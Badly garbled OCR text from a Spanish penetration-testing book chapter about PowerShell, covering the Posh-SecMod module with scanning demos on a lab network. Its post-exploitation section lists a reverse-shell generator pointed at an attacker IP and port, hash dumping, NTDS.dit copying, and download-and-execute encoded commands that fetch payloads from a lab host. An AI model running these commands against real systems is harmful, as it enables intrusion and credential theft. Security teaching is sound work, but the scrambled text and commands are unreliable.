DETALLADO: [*1 Enumerating server PiiP-56.:—————— — - (13 of 245 
[x1] Enumerating server P11P-12. ———— — —, (14 of 245 
[x] Enumerating server pco2 —— —————— 15 of 245 


[x1 Enumerating server a local (16 of 24 
[x1 Enumerating server ical (47 of 245 


[x1 Enumerating server 11 (18 of 245 

[x] Enumerating server zal (19 of 245 

DETALLADO: [*] Enumerating Server cal (28 of 245 
7 \Pablo -Gonzalez’ has local admin 


DETALLADO: [+] Current user 
-i t —À local € ——— ) 


-local 

LJ Enumerating server 
DETALLADO: L*1 Enumerating server 
DETALLADO: [*1 Enumerating server al (23 of 24D 
DETALLADO: [1 Enumerating server local (24 of 245 
DETALLADO: [+1 Current user mm Pablo - Gonzalez” has local admin 
ccess on m -local < .146> 
.local 


Fig. 3.20: Encontrando máquinas dónde 


. «21 of 24) 
ocal (22 of 24) 


el usuario tiene acceso de administrador. 
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21 último comanc | 1 Q 
- I lo >i ual | ace L € S 
J, € ace un resume ] 
x en glot al de tod 3 
€ aos los ( 


este comando, indicando el hostmame 


hecks es 7 
HCCKS es , 
16 ks es Invoke-hostenum. Ci 


a un aC ( 

4 le a lagi inc el di mu MIc 

: i 9e s ol lene gran 
MO acior € reco € OS g [ JS Qe 1 1aqu a OS suarios 


n 
xistentes cantidad de 
existentes, los recursos c A 2 io ntidad de 

ecursos compartidos existentes. los pr administradores. los servic 
logados en la máquina edite Inf es, los procesos que ejecutan en] i a OS servicios 
á , etcétera. Información ri Anne an en la máquina, los usuarios 
1 muy interesante v a. los usuarios 

$ sante y que ayud 


posibles puntos débiles e a ta L 
s en las máquinas del dominio. a a conocer más detalles y 


4. Posh-SecMod 


Posh-SecMod PS $ P. 
es un módulo para owerShell v3 el ual pr i 
SA cue oporcion 


que pueden ser ütiles en el dí : Tem - 
; tiles en el día a día del pentester. Es a una colección de funciones 
ester, Este conjunto de módulos ha sid ei 

i s ha sido escrito por 


Ca lo Pe cz. ] € asc i A 7 O! ISA- (4 a se pue escarg. les | S 
5 7 quiza 158 conog d comi t 2C. ) S | i 
pum P j € ! O CC Dark Opec at d 'h-Sec Tod s de desc ar ( 
repositoric de MUD tps github com. cai kope ator / -Se Le : s 
ra OS c 14 
as funck I lc c I este ( ee era 1 l ) 
] aic id 2s JOIC à 
que ro[ orciona est [6] ulo se enumet 
ontinuaci 4 
M 


- Discoven 


'. Funcione : 
; A ^ es que per ` alizz bow 
funciones típicas de eta - | peras realizar descubrimiento en la red. Se pued 
para obtener info apas de /oorprinting como puede ser el Whoi f e pueden encontra 
ormaci! Bri Cd " q. Ols, A A 
ación de un servidor DNS, enumerar un rango d ionalidades de red 

L er ango dec irecciones IP 

V $ 


de puertos sobr iip 
sobre maquinas re t: E 
céter: s remotas, escaneos a través del pro E 
etcetera. avés del protocolo ICMP o esca ARI 
” scancos ARP. 


escancos 


Utilities. Est 
. Este módulo pr ciona difi 
in E E S | — c FÁ— diferentes funciones que permiten al 
| uit i^ — i e uten al pentester desd 
edil s direcciones UI pend de 
gestión de hash i redigi > 
B Shes en ficheros con difi anejo de archivos c | 
mL S cheros con diferentes algoritmos como MDS SH qme 
] , SHAS12, obtener la última versió " ij ve n : : 
puede ver es un módulo dioere versión de las herramientas de Susint i En 
e con "ree s MM B i bn 
bn veniendo: de diferentes utilidades que en un mome | em em 
! X rename momento pueden ayudar durant 
Registr , M i | | | | 
gistry. Este módulo proporci 
ac E Mac ait 5 proporciona una colección de funcion 
i í gistro de los ec ui 2 y E o 
an juipos de forma remota a través del lenguaj i 1 A 
T guaje de instrumer 


suario 
tación 


ludit. Es : 
Audit. Este módulo pr T ` 
Funciones que pavit proporciona funciones enfocadas a la audit 
A en enumerar - idas a la auditoria de sistem: 
his áis del ditm imerar los tipos de sesiones logadas. recup d de sistemas 
: < 'ectorio acti — —— e COSS, erar informaci Eco 
activo, recuperar má O activo, recuperar información sobre | ormacion sobre 
perar más detalles sobre el directorio activ obre los usuarios del directoris 

z activo. etcétera j ¿ 


PostEx j ¡ 

A " ploitation. l > y 1 

Du i „Ste módulo presenta funciones que ayudan | 

as ( a) c a pentester 


e post-explot ad : " 

plotación. Estas tareas s , "Bia liar 

pueden encontrar funcior stas tareas son vitales para terminar con éxit a realiza 
ones * permi s s exito ente 

cual se puede ejecut - que permitan transformar código de P ex "s di diia) dos 
jecutar desde la lince 5 owerShell en base 

tamaño de : a línea de comandos. funci n base64., el 

el script. funci s, funciones que ayudan a c : 

dde € p nciones que hacen la descarga de un scri 1 yudan a comprimir el 

e lorma encodeada. Además, la posibilid ESE un ntn 

S, sibili 


de WMI, re y ejecutan su 


i m ac a M » - , 
aliza un dumpeo de hashes del si Vener ii cs 
she: sistema, devolver una s/ie// invers t Pm 
4 rsa a otra máquina 
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i j lit, utilidades para 

i ia del fichero ntds.dit, 
deed ndi prim LA pem como se puede entender tras 
til a la hora de no disponer de otras 


11 
configurada para e ; A 
Mee at contenido a hexadecimal, etcèt 


i i te y ú 

la enumeración de acciones, es muy interesante y 
herramientas en el sistema. 
. Parse. Este módulo proporciona func 

p= i tilizadas para interactuar 
Nmap o DNS. Este módulo proporciona funciones que pueden - a wa rd 
à s mai ^ " pudiendo conectar y realizar consultas con 
con bases de datos, 


s 


i i i QLite 
recopilar en V i igar ciertos a chivos 
il una fase pre ia del pentesting, como para invest g 
pi V T I S 


durante el proceso. 3 iten interactuar con estas 
paa sTotal, Shodan y Metasploit. Estos módulos —— C Hanc dp cn 
= gu me rok simplificando su integración o uso A tein TR Mn 
premiers Il. En la versión 1.3 de Posh-SecMod se han € 
de PowerShell. 


-VirusTotal, con sus 

Posh-Metasploit, Posh-Nessus, Posh-Shodan sak de ensamblados y 
con 4 es propios. Posh-Nessus x v mnia ee 
s digo i de uno de los esc -— dedo de AP 

ciones para automatizar el uso : e Metasploit Framework a UR Lx 

RA funciones para ear qp ed para iin conr acsi M D 
XMLRPC. Posh-Shodan prop manido un API kay. Pos h-VirusTotal propo iv foe 
—— — VirusTotal a través de una API — e Poweriliell 
t i mr pre y son interesantes para el pentesting des 
estos módulos, 


iones para realizar parseos de ficheros XML de 


Módulos para comenzar dulos de Posh-SecMod relacionados con las utilidades básicas, 
ódu 


t to de re Si e base de datos unci de auditoría. 
tratamien ió y f 10nes 
i gistro par: eos sobre ficheros, gestion d E à i ^ 
Para a mejor compr ensión se realizar án algunas pruebas de ig m de e func una dn des t 
d l de Posh-SecMod. El pr imer módulo de que se enumeraran as funciones 
r mó ulos S 
ofi ecen en estos 


disponibles es 4 udit: 


En este apartado se muestran los m 


Descripción 


i en una 
Esta función enumera las sesiones NM as : 
dada. Internamente esta función utiliza e ne n 
ada. utiliz 
Por ejemplo, si se quiere saber que sesiones 


J u o - it. ( )nSessions | 
eje 


where-object ($ .processes 
i i do 
Enumera los equipos pertenecientes al — 
información sobre las versiones de "Y na OP dentro 
ejecutan las máquinas, el service p i 
f dominio, la dirección [P de la máquina, 


máquina 


Get-AuditLogedOnSessions 


Get-AuditDSComputerAccount 
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Función 


Descripción 


Enumera los usuarios pertenecientes al dominio mostrando 
información como el nombre de cuenta o SAMAccount, ruta 
DN en el dominio, datos sobre la contraseña como la fecha de 
modificación, expiración de ésta, etcétera. Además. informa- 
ción sobre los grupos a los que pertenece el usuario, el último 
logon o el identificador de seguridad SID 


Enumera las cuentas de usuario que se encuentran bloqueadas 
en el dominio 


Get-AuditDSUserAcount 


Get-AuditDSLockedUserAcount 


Get-AuditDSDisabledUserA- 
count 


Get-AuditDSDeletedAccount 


Get-AuditInstallSoftware 


Enumera las cuentas de usuario que se encuentran deshabilita- 
das en el dominio 


Enumera las cuentas de usuario que se han eliminado en el 
dominio 


Devuelve el listado de software instalado 


Esta función recupera las marcas de tiempo de un archivo, el 
cual es pasado a través del parámetro file. La información 
que se recupera es el ültimo acceso, la ültima escritura, la 

fecha de creación, la fecha y hora de modificación. la cual no 

se muestra en las propiedades de un fichero 

Tabla 3.14: Funciones de Audit en Posh-SecMod. 


Get-AuditFileTimeStamp 


El segundo módulo a tratar es Database. 
base de datos SQLite: 


Connect-DBSQLite3 


Remove-DBSOLite3Con- 
nection 


Get-DBSQLite3 Connection 


Estas funciones permiten al pentester interactuar con una 


Descripción 

Permite crear una conexión a base de datos SQLite 3. La conexión 
es almacenada en $Global:sgliteconn 

Elimina una conexión SOLite. Para eliminar la conexión se le tie- 

ne que indicar el index adecuado. En caso de no pasarle un index 

se lleva a cabo la eliminación de todas las conexiones, por ejem- 

plo Get-DBSQLite3Connection | Remove-SOLite3 Connection 


Enumera las diferentes conexiones abiertas con la base de datos 


Ejecuta consultas SQL contra una conexión existente. Para indicar 
la conexión que se quiere utilizar se dispone del parámetro index. 
Un ejemplo válido es Invoke-SQLite3Query -SOL "SELECT 
nombre FROM tablal; " -Index 1. Esta instrucción devolverá los 
valores del campo nombre que se encuentra en la tabla! a través 

del uso de la conexión con identificador 1 


Tabla 3.15: Funciones de Database en Posh-SecMod. 


Invoke-SQL ite3Query 


Pentesting con PowerShell 


P p illa 
i S l 7 ster ar = 
^ S nciones permiten i ; i 
j r es Pa se. Es tas tu : 
— de reinen como Nmap o DNSRecon y filtrar estos ficheros A e e " as 
| | q i i ] E ulo ] arse y del módu o Data — se 
ici e requieran. Jun à "S 
i i d in ormacion de una 5 a : e 
y y - 5 l "se pr orciona 2 funciones: 
inf ne 


Descripción 


Importa un fichero XML de Nmap y devuelve una colección de 
m 


1 ió scaneo que se 
objetos, los cuales representan la información del e q 


encuentra en el fichero XML - 
n fichero XML de la herramienta DNSRecon creando 


: — 
e proporciona la herramien 
X ML .Aoutput.xml -Filter SRV 


e Record reporta- 


Import-NmapXML 


Importa u de 
objetos con la información qu 
Por ejemplo, is a —— 
bjetos con informac! 
— dos por DNSRecon 


I mport-DNSReconX ML 


Tabla 3.16: Funciones de Parse en Posh-SecMe sel. 


E y izar 
El cuar to módulo tratar es Re z [SIM Con estas fu ciones el 2enteste! puede manejarse 

8 1 - D 

a D . real 


accionc de forma cómoda en el re 1stro de la maquina. 
S g 


Descripción 


ro de una clave de 
Enumera las claves que se encuentran dentro de 


registro 


Get-RegKeys 


i indicada 
Crea una clave de registro dentro de la clave in 


Elimina una clave de registr 
s ti éstos de t 

Enumera los valores y los tipos de ésto 
i registro indicada — 
icació istro indi- 
Chequea si se tiene acceso à la ubicación del — m 
cada. Además, chequea el tipo pni id pit a 

: : arámetro Access! 

icació ¡és del uso del pa 
la ubicación. A trav 


pI egu taa la h nción s se tene pe i ra T izar consul- 
ic i 1 rmiso pa a eali : 
: ^ . q 


o indicada 


ina clave de 


Test-RegKeyAccess 
tas, eliminar claves, mo 


etcétera — 
ve indicada 
Modificar o poner un valor à una cla 
[.—  Se-RegWdue | TUE T 
L— pur | Recupera el valor de la clave =- 
-e imi j specifico de una cla 
[—Remove-RegValue | Elimina un valor esp s ns 


Get-RegKeySecurityDescriptor 


el propietario de una clave de registro 


umera ! 
e control de acceso de dicha clave 


i -Sec Mod. 
Tabla 3.17: Funciones de Registry en Posh-SecM 
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El quinto módulo a tratar es Utility. Estas funciones proporcionan al pentester pequeñas utilidades 
que pueden ser necesitadas en algún instante en el pentest. Esta pequeña colección de herramientas 
proporciona diferentes acciones y. en algunos casos, muy diferentes. 


Esta función permite descargar un archivo desde una dirección 
URL y almacenarlo en una ruta local 


Función 


Get-WebFile 


New-Zip 

Add-Zip 
Get-ZipChildltems Recurse 

Get-Zip 


Crea un nuevo fichero Zip con contenido 
Añade contenido a un fichero Zip 
Lista el contenido del fichero Zip de forma recursiva 
Lista el contenido del fichero Zip 


Descomprime el contenido del fichero Zip y lo almacena en una 
ruta la cual se indica como parámetro 
Esta función recibe un fichero y devuelve el hash de dicho 
archivo en formato MD5, SHA1, SHA256. SHA 384 0 SHAS12, 
Como ejemplo se indica ls *exe | Get-Fileltash 

Permite la descarga de la ültima versión de las herramientas de 
Sysinternals. La ruta dónde se descargan se indica en la invoca- 
ción de la función 

Enumera los objetos COM disponibles en el sistema local 


Lista la versión que se está utilizando de Posh-SecMod e indica 
cuál es la ültima versión disponible 


Expand-Zip 


Ger-FileHash 


Update-SysinternalsTools 


Get-PoshSecModVersion 


Tabla 3.18: Funciones de Utility en Posh-SecMod. 


Discovery 


Este módulo permite al pentester disponer de funciones que ayudan en el proceso de 
fingerprinting. Todas las funciones que se 
técnicas internas como externas, ya que 
descubrimiento. 


Jootprinting y 
pueden encontrar en él son utilizables tanto en auditorias 
permiten de una u otra manera facilitar el proceso de 


Una de las caracteristicas de las funciones de escaneo que se encuentran en el módulo Discov ery es 


que permiten realizar un escaneo básico de diferentes formas, e incluso a difere 
Las funciones que se pueden encontrar en este módulo son más de 10 


Función |] 
| GermDNSRecord | 


Get-MDNSRecords 


ntes niveles de red. 
y se describen a continuación: 


Descripción 


Realiza una consulta Whois sobre un dominio que se le proporciona 
a la función 


Enumera los registros mDNS que se encuentran en la red local 


í x DA 
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ES. 1... — — 


j H /6 según el rango indica- 
Genera una colección de objetos IPv4 o pns S : e Sp 
lo. Por ejemplo, New-/PRange Range 192.168.1. 2. 
i s indicadas en el rango proporcio- 
Genera un listado de direcciones IP indicadas en el rango pro] 
s . i j m .. 
o nado a la función 


New-IPv4Range 


Genera un listado de direcciones IP a iie din pa E 
-iona a la función. Por ejemplo, New-/Pv6From 
— 192.168.1.0/32 
== resolución inversa. La función admite diferentes opciones 
diim a uiis direcciones IP. por ejemplo Huge 
— Es ; -CIDR «red? o Invoke-ReverseDNSLookup Range 
— pación IP inicial>-<dirección IP final> 


New-IPv4FromCIDR 


Invoke-ReverseDNSLoo- 
kup 


; y direcciones 
Realiza un escaneo a través de ICMP contra un rango > 
‘alze ESCE e E ln iiis 
IP proporeionadas a través del parámetro Range. Tam p 
C A s T 
| utilizar el parámetro —& IDR 


Invoke-PingScan 


vés del protocolo TCP y 
Realiza un escaneo completo a traves del M : ^u 
UDP. Por ejemplo, Invoke-PortScan -Target o ( 
st 22.135,139,445 -Type TCI 
sal, Este ti e escaneo 
Realiza un escaneo ARP sobre la red local, Este aem | a 
caliza SCC 4 s i Ld Lond 
permite descubrir máquinas conectadas a la re 


Invoke- PoriScan 


i 3 del sistema local 
Enumera los servidores DNS del sistema loc 


i » di inio 
Enumera los registros SRV del DNS dado un domi 


istro C 2A 
ini | a su registro CNAME, 
: e de dominio o FQDN 2 g 
Resuelve un nombre c 
o AAAA | 
servidor DNS. Por ejemplo, 
Realiza consultas especificas contra un Serv idor DNS. + p 
i ` » > Peg Y y -Tvpe M. 
Resolve-DNSRecord -Targel microsoft.com -Type : 
: hà irección IP a formato /1- 
Conviene una String que representa una dirección IP a 
o a String 
Addr-ARPA 


n Co, 1 
, " overv en Posh-SecMod. 
Tahla 3.19: Funciones de Discover) 


PoC: Tipos de escaneos — Á 
diarán diferentes funciones 

adeconc se estudiarán diferen po 
zn esta prueba de concepto s | e ie pst e ta 
enit sen una red, ya sea local o remota. Principalmente el men on 
rbi tma opns s para realizar descubrimiento de máquin 
proporciona 3 funciones para re aee 
funciones relacionadas con el protocolo DNS. 


alizar un descubrimiento 
'ery de Posh-SecMod 
ite. omitiendo las 


ster a 
o- A Fr J aP S .P avi arán a entes d 
P. ^ So ay 1d 1 l p 
i Invoke R Scan Inve ke 3 ing: can Oo Invoke O! tSc an a 
Las funciones "4 n , 


reconocer máquinas en la red. 


Capítulo III. PowerShell puro: El arte del pentesting 


La primera función es /nvoke-ARPScan. | 


permite conocer el nümero de máquinas qt 


a cual es muy útil en una red de ámbito local. va que 
MAC de éstas. 


ie existe en la red y la relación dirección IP — Dirección 


El escaneo es a nivel de 


enlace, por lo que los firewall que trabajan a nivel de red no bloquearán 
estas peticiones. 


PS Dinlibrosspentesting powershellWXPosh-SechMod-masterNDiscoverg? Invoke-RRPScan -MaxThreads 18 -CIDR 
192.168.56 .8/24 


-168.56.188 
192.168.56.181 
192.168.56.1982 
192.168.56.183 
192.168.56.255 

D:Nlibros*Npentestin povershellwPosh-SecMod-masterNDiscouer > 


Fig. 3.21: Descubrimiento de máquinas a nivel de enlace con ARP 


Scan. 


El escaneo por protocolo ARP se reduce a la realización de una petición ARP 
broadcast que es la fff fF fF fF ff preguntando por una dirección IP en concre 
un mensaje que es enviado a todas las máquinas de la red a nivel d 
¿Quién tiene la dirección IP X? Como la función /nvoke- 
rango de direcciones IP, a través del parámetro Ra 
CIDR, se puede preguntar a tod 
conectividad. 


Request a la dirección 
to. Se puede traducir en 
e dirección MAC y que pregunta, 
ARPScan permite al usuario configurar un 
ge, O una máscara de red. a través del parámetro 


as las máquinas que se quiera para ver si están encendidas y con 


El escaneo por ICMP es el que se implementa en la función /nvoke-P. 
de cortar ya que se podría bloquear, es decir, hacer que | 
Es un escaneo rápido y que de un primer vist 
con las máquinas de una red, y 


ingScan. Es realmente sencillo 
a máquina destino rechazase la contestación. 
azo puede aportar conocimiento sobre la conectividad 
a sea local o remota. 


PS D:Mli rosNpentesting powershell*Pos 
24 


h-SecMod-masterWDiscovery> Invoke-PingScan -CIDR 


192.168.56.8 


192.168.56.181 
192.168.56.182 
192.168.56.183 


powershellxPosh-SecMod-masterDiscover 


Fig. 3.22: Ejecución de un escaneo a través de ICMP en una red 


La función /nvoke-PoriScan proporciona un escaneo de puertos a través del protocolo TCP y UDP. 
Mediante el uso del parámetro Type se puede elegir e 

realizar un escaneo de puertos contr 
CIDR, o directamente contra un 
permite enumerar un 
y 25 


En la Imagen se puede visualizar la ejecución de esta función dónde se obtiene como result 
Puertos 


ado los 
abiertos de una máquina. 
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EN KAá=>>=>== l 


terNDiscoveryu? Invoke-PortScan -Target 192.168.56. 


E D:NlibrosNpentesting pouershe11NPosh-Sechod-nmas 
M3 -Type ICP -Ports 21,22.80,445,588 


ost aaee 


92.168.56.183 ICP 
H92.168.5G.103 TCP 
92.168.56.103 TCP 

92.168.56.183 TCP 


ouershellsPosh-SecHod-nasterxDisco 


IPS Dinlibross 
Fig. 3.23: Ejecución de un escaneo de puertos TCP. 


En algunos casos puede ser interesante mezclar estas funciones con scripting básico o con 


canalización de objetos para potenciar el uso de las funciones. 


Por ejemplo, para poder realizar un escaneo sobre una máquina concreta a un rango de puertos lo 
suficientemente grande como para no poder enumerar en la línea de comandos todos los puertos 
se puede hacer uso del operador de rango “-. ". Para generar una colección de nümeros entre un 
valor mínimo y un valor máximo se ejecuta la instrucción valor minimo?..«valor máximo, por 
ejemplo 20..500. Esta instrucción devolverá 480 líneas dónde cada línea es un nümero empezando 
por el 20, 21, hasta el 500. Utilizando canalización se podría pasar cada nümero a foreach para que 
anera 20..500 | foreach { Invoke-PortScan —Target «dirección IP» 


itere sobre ellos de la siguiente m 
-Ports $_ -Type TCP j. La variable especial $_ irá cogiendo los diferentes valores entre el 20 y el 


500 por cada iteración, tal y como puede visualizarse en la imagen. 


PS D:nlibrosspentes ing pouershe11NPosh-SecMod-masterDiscovery? 28..588 ! foreach €Invoke-PortScan 
Target 192.168.56.103 -Type TCP -Ports $> 
Type 


TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
ICP 


ost Port State 


192.168.56.183 Open 
H92.168.56.193 Open 
192.168.56.183 Open 
192.168.56.103 Open 
192.168.-56.183 Open 
92.168.56.103 Open 
92.168.56.103 Open 
92.168.56-183 Open 
192.168.-56 .183 Open 


Fig, 3.24: Seleccionando un rango de puertos TCP con Invoke-Portscan. 
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al pentester obtener el nombre de dominio o de 
a función dispone del parámetro 
d a través del uso de la 


La función Invoke-ReverseDNSLookup permite 
máquina a través de la resolución inversa de una dirección IB. I 
Range y CIDR para configurar rangos de direcciones IP o escanear una re 
máscara de red. Si se quieren escanear direcciones IP de diferentes redes o muy variadas, las cuales 
no son consecutivas, la función no dispone de un parámetro para ello, por lo que se puede hacer un 


ejercicio sencillo de canalización. 


En primer lugar el pentester crea un archivo de texto dónde por cada linea introduce una dirección 
IP. Este fichero será pasado a través de un pipe a foreach dónde por cada iteración se ejecutará una 
llamada a esta función con un rango p a que corresponda en 
cada iteración. La instrucción a ejecutar es cat «fich | foreach 1 Invoke- 
ReverseDNSLookup -Range $ -5 j.La variable $_ es utilizada en el parámetro Range para poner 
el mínimo y el máximo del rango, en este caso es el mismo valor. 


ara una sola dirección 1P, en este caso l 
ero con direcciones [P> 


T 


a ECLLLOOOOo40 
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D:Nlibrosspentestinyg ers sh-SecMod-masterDiscover: cat .Vip.txt | foreach (Invoke-Reve 
DNSI } R CIC 
y EM rshellxPosh-SecMo N y> Nip 


Aliases 
k fiddressList 


goog public-dns-a. C 

koogle-public e 8 
11P-807.11Paths.local e e 
ETASPLOI TABLE 8 


«8.8.8.8» 
«8.8.4.4» 


XF680: :4e9 :e464:5973:944£; 
(192.168.56 10:30 OS 


IPS D:Nlibros*Npentestin 


powershellXPosh-SecMod-masterNDiscover 


- 25- R "m " 
E. J.2- esolución inversa de direcciones IT obtenidas «c aves de fichero personalizado. 
4 E. } ES 0 I btenic 2 f 
F 3.25 nm s a través de fich 
I onalizado. 


Post-Explotación con Posh-SecMod 


| módulo de PostEx, j / 5 
stExple 2 ec) 
- » ^ ci ~ 7 in: de Posh-Sec Mod presenta un gran nümero de funciones rel ionad 
( a fase de post-ex, J " : A dee "i 
und h d s e otación de un test de intrusión. Como se puede leer en la de ipc ^ à 
as nciones el pentester ade disfrutar y : à PS 
listado d aa dela puede ej es de diversas opciones para obtener in formación 2: 
sta e À $, 40 las maquinas a las que se ac sede, la ibilidad Me aiii 
"m > as [t , la posibilidad de S xdi ( r 
en diversos format IS. ga . pos Ida de descargar código sjecutable 
; UT s OS, la posibilidad de ejecutar procesos de forma re i o — 
Pe . Pod im a remota, una sheli inversa a través 


Este módulo es uno is fünci 
O es uno de i cionales c 
ende d ir e los más funcionales del conjunto Posh-SecMod, aunqu 
en el resto de E SML. eia ni $i ids > COmo se 
e módulos hay funcionalidades muy interesantes para la realiz ] ? sii 
» > ` ara id realizacion del 7 


pentest 


A continuación se stre unci 
acion se muestran las funciones disponibles en el módulo 


Función 
Descripción 


Esta función convierte 
a función convierte un comando en formato String en un 
comando encodeado en Base64. C i NE 
« deado en Base64. Como ejemplo se presenta la 
siguie z viov amos ^ L ; M 
>E €— instrucción Convertlo-Base64Command -command 
E : da l i $i € et Ht € 
K : : host ‘hello world", dando como salida dwBvAGkAdaA 
- " 1 4 LA » Ps e 
JAaABvAHMAdAAgACCAaABIAGwAbABvACAAdwBvA 
HIAbABKACCA. | 


ConvertTo-PostBase64Com- 


mand 


Transforma el contenido de un script en un Enc 4 
Combi - o bien transforma un Miis sie im e e a 
ompress-PostScript dedCon 1. La funció de cmi ic y 

j mand. La función admite un parámetro file que recibe 
una ruta de un script para transformar, o un parámetro an | 


mand que representa el c 
enel que representa el comando que se quiere transformar 


New- 
PostD. ! 
ownloadExecuteScript 


Esta funció ert j y 
"E genera un EncodedCommand que descarga un 
script de erShe o ejer i en 
i owerShell y lo ejecuta en el sistema de la siguiente 
forma PowerShell.exe j i 


EncodedCommind <command 


Esta funció er: , 

a función genera un EncodedCommand que descarga un 
irr'ay ae bytes y jec i iaie 
array de bytes y lo ejecuta sobre el sistema de la siguiente 
forma PowerShell.exe DA : 


New-PostDownloadExecutePE 


EncodedCommand «command 


EH Pentesting con PowerShell 


Descripción 


Esta función ejecuta un proceso en una máquina remota a 
través del lenguaje WMI 


Esta función genera un comando que permite realizar un 
volcado de hashes de la máquina, comúnmente conocido como 
hashdump. Como ejemplo se presenta la siguiente instruc- 
ción $com = Get-PostHashdumpScript, la cual almacena en 
la variable $com el comando que se ejecutará a posteriori con 

PowerShell.exe -command $com 


Start-PostRemoteProcess 


Get-PostHashdumpScript 


Esta función proporciona un EncodedCommand, el cual crea 
una conexión inversa que proporciona una shell. Generalmen- 
te esta función es utilizada junto a Start-PostRemoteProcess. 
Como ejemplo se presenta la instrucción $com = Get-PostRe- 
verShell -LHOST 192.168.1.104 -LPORT 4444. Después la 
variable $com puede ser utilizada por funciones que ejecuten 

procesos 


Copia el fichero NTDS.dit. el cual es el fichero que almacena 
información sobre los usuarios y máquinas de un dominio en 
un controlador de dominio, utilizando Volume Shadow Copy. 
Por defecto, el fichero se copiará en la ruta Senv: TEMP 


Get-PostReverTCPShell 


Get-PostCopy NTDS 


Convierte un fichero en un array de bytes en hexadecimal 


Convierte un array de bytes en hexadecimal al fichero origi- 
nal. Con estas 2 funciones se puede transformar un binario en 
contenido hexadecimal y meterlo en un fichero de texto para 
introducirlo en un sistema 


ConvertTo-PostHextoFile 


Devuelve un listado de conexiones en formato String 


Devuelve un listado de los Application Pool y contraseñas de 
los directorios virtuales 


Tubla 3.20: Funciones de PosiExploitation en Posh-Sec Mod. 


PoC: Base64, compresión, descargas y ejecución 

En esta prueba de concepto se van a probar diferentes funciones relacionadas con la ejecución de 
código en Baseó4, la posibilidad de descargar ficheros externos y poder ejecutarlos. Estas funciones 
pueden ayudar a un pentester a conseguir descargar el fichero, ya sea instrucciones en PowerShell o 
un binario. en la máquina dónde se encuentre o en una máquina remota. Quizá, el mejor escenario para 
utilizar estas funciones sean máquinas Windows sobre las que el pentester no tiene privilegio, pero 
sí que puede ejecutar instrucciones en una PowerShell, ya sea porque tiene acceso local o remoto. 
Puede que el pentester se encuentre en un entorno sobre el que no puede instalar aplicaciones. y no 
dispone de sus herramientas. 
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La primera función que se muestra en esta pt ieba de concepto es ? z^ -] J, on est: 
Š 

ó > p 5 Cor pre SS osts ey 1 C 
cript. t 

unción el È entester puede comprimir el contenido de un SCr'ipl y almacenarlo en una am os " 

el fir de ejecutarlo después mediante la instruc J ‚exe Immana $ 2 i de MIUe 

. cion / owerShell. 
X E ommana > file . dón ] 
bh la val ¡able que almacena el contenido del Script de forma comprimida. En la imagen se eS 
p ] ] pl e un se 1p que ejecuta : palabras por pantall > | 
V isualizar un pequeño ejemplo de n y T j a 


PS C:NUsers*Npgonzal Desktop» 
Desktop? cat 


copain. psi 
ateStream ($(Neu-0 
50I8^ 5255. LIO CORDES AINE 


5NpgonzalezNDesktopNp.psi 


5 G:Misers*pgonzalezNDesktop? 


g. 3.2 ompresion de un fichero de PowerShell para su 20slerior eCOCHCIOÓN 
est ejecución. 
Fi 6: Com 7 ji de P. Sh "n F j ) 


La segunda función que se presenta en P, 

Esta función : se presenta e la prueba de concepto es New-PostDownl, adEx 

S permite descargarse un script en remoto y genera un £ | tr year 
e JS x - 


wi Script. 
comando en Powers, m ncodedComn EET us 
owerShell que se encuentra en Base64, pero es totalmente ej i amd, es decir, un 

, 5 tota jecutable., 


Una de las cosas i : 
E S 5 interesante e 
Bl Jer qué de deik mes que se pueden hacer con esta función es la descarga de ur 
j S scargara en esta prueba de c ` A , qe 2 | SCrIpl. 
> ; Qo " concepto proporciona £ , 4 
descargarse un binar pto proporciona al pentester la posibilidad 
g ina ? se encue ster la posibilidad de 
el pentester tie ario que se encuentra en Baseó4 en un fichero de texto. Es deci e eei 
oster tiene e Émi " : 2. ALO. ES Cir, su JAS > 
ficheros £xf, l : una máquina con dirección IP 192.168.56.101 un servidor web dónde vd E 
eros /xf, los cuales contiene T RS 3 pw S "web dónde ofrec 
New-PostDownl JE contienen un fichero transformado en Base64. La idea es qu la f eer 
did mloadExecuteScript s — ; cja a es que con la ió 
ecuteScript se descargue un fichero txt de los que se ofrece ) sl 
D e en el servidor 


wep. E t 1C I ‘Zo HC E P e 
SA ` 

ormara ei conte d e iche o Az en un / ncoded mmu 1, el cu il ( dr A 
V b sta func is t ansí rm l tenido d | f C 18) iana | € ) 


A continuació 5di 
ns 2er ^. ^ 16 
E e muestra el código de una función en PowerShell que transform 
t srep a ` : 
«un script, un documento o cualquier cosa en un fichero que 


a un fichero. ya sea 
en Base64. La ejecución de esta función es senci 3 dac em 
e — jis à; a ción es sencilla ConvertTo-Base64 —SourceFilePath <Fie) i 
| hs X * i € Libia 
; jempio un EXE? -TargetFilePath «Fichero dónde se almacen x B hs E 
| londe ; ena en Baseb4>, 


T onvertTo-Basef4 
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TC [Paramecer (Mandatory) 
sbytesReae! t7 [string] $pathTa: 
[Parameter (Manda: 
[string] $ip 


string] $path, 


ory) ] 


i are m fichero 
a utilizado la función anterior para generar v 


ratiy. | pentester es 
la herramienta psexec de Svsinternals. El EAN a ps 
herr adii ae” SS 
64 de bern bajo su control, pudiéndose extrapolar 
una ubice è 


esite durante la auditoria. 


En esta prueba de concepto el pentester h 
txt que contiene el Base 
descargar este EXE desde — 
herramienta o archivo que el pentesler 


Xt -TargetFilePath S$pathTarget 


download -path psexec.txt -pathTarget .Xpsexec.exe -ip 192.16 
" á utilizada por el pentester 
a i Base64 al fichero original. Esta función será utiliz naim i d 
— La idea es que está función no se encuentra 
a idea 


, Y ^" j f 
1Ó -PostDownloadExecuteScrip 
jará función New-Post 

se la bajará con la 


Dentro del fichero se tiene en la última línea la instrucción don 
La siguiente fun 
'exec.exe. 
erar el fichero psex 
para recup ; med 
máquina dónde está el pentester, este 


de Posh-SecMod. 


"load -path psexec.txt -pathTarget 
.psexec.exe -ip 192.168.56.101. Cuando se ejecute la siguiente instrucción PowerShell.exe 
-EncodedCommand (New-PostDownloadExecuteScript -Url http:/192.168.56. 101/download. 
ixi), se abrirá una nueva sesión de PowerShell y se ejecutará el resultado de la instrucción New- 
PostDownloadExecuteScript. -Url http://192.168.56. 10 L/download txt. Ésta ültima instrucción 
genera un EncodedCommand que lo que realmente realiza es la ejecución del contenido del fichero 
download.txt, por esta razón la última línea del fichero download.txt e 


-pathTarge! .psexec.exe -ip 192.168.56.101 para, una vez cargadas las funciones. ejecutarlas. 


function Conve 


s download -path psexec. 1x1 


Puede parecer algo enrevesado, pero si se aplica paso 
obtener cualquier tipo de archivo en la máquin 
pudieran existir. 


a paso se verá sencillo. Este proceso permite 
